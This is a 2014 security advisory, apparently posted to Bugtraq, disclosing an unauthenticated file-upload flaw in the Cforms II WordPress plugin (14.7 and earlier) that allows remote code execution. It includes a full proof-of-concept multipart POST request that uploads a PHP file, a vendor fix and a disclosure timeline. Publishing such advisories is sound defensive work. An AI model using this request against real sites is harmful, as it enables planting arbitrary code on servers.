Cforms 14.7 Remote Code Execution

`Advisory: Remote Code Execution via Unauthorised File upload in Cforms 14.7   
Advisory ID: -  
Author: Zakhar Fedotkin  
Affected Software: Wordpress Plugin Cforms II 14.x-14.7 (Release: 12th Nov 2014)  
Vendor URL: https://wordpress.org/plugins/cforms2/  
Vendor Status: fixed  
CVE-ID: -  
  
==========================  
Vulnerability Description:  
==========================  
  
The Cforms 14.7 and before are vulnerable to unauthorised user file upload. It's affected contact forms thats was created without file upload box. File lib_nonajax.php accept files with all extensions, that could lead to remote code execution  
  
==================  
Technical Details:  
==================  
  
POC:  
Request to the valid contact form looks like:  
POST /wordpress/ HTTP/1.1  
..  
Connection: keep-alive  
Content-Type: multipart/form-data; boundary=---------------------------13530703071348311666826727318  
Content-Length: 1747  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="cf2_field_1"  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="cf2_field_2"  
test  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="cf2_field_3"  
[email protected]  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="cf2_field_4"  
http://  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="cf_uploadfile2[]"; filename="up.php"  
Content-Type: text/php  
<? phpinfo(); ?>  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="cf_working2"  
<span>One%20moment%20please...</span>  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="cf_failure2"  
<span>Please%20fill%20in%20all%20the%20required%20fields.</span>  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="cf_codeerr2"  
<span>Please%20double-check%20your%20verification%20code.</span>  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="cf_customerr2"  
yyy  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="cf_popup2"  
nn  
-----------------------------13530703071348311666826727318  
Content-Disposition: form-data; name="sendbutton2"  
1  
-----------------------------13530703071348311666826727318--  
The error is in lib_nonajax.php and default settings lib_nonajax.php allow to upload files to the default directory for versions below 14..6.3 it is cfroms plugin home directory. For version 14.6.3 and after it is wordpress upload directory. Default settings for contact form without upload field is None, so it's possible to upload *.php file.  
  
  
=========  
Solution:  
=========  
  
Update to the latest version  
  
====================  
Disclosure Timeline:  
====================  
  
15-Dec-2014 ? found the vulnerability  
22-Dec-2014 - informed the developers  
23-Dec-2014 - response by vendor  
27-Dec-2014 ? fix by vendor  
29-Dec-2014 - release date of this security advisory  
29-Dec-2014 - post on Bugtraq  
  
========  
Credits:  
========  
  
Vulnerability found and advisory written by Zakhar Fedotkin.  
  
===========  
References:  
===========  
  
https://wordpress.org/plugins/cforms2/  
http://infosec.ru  
`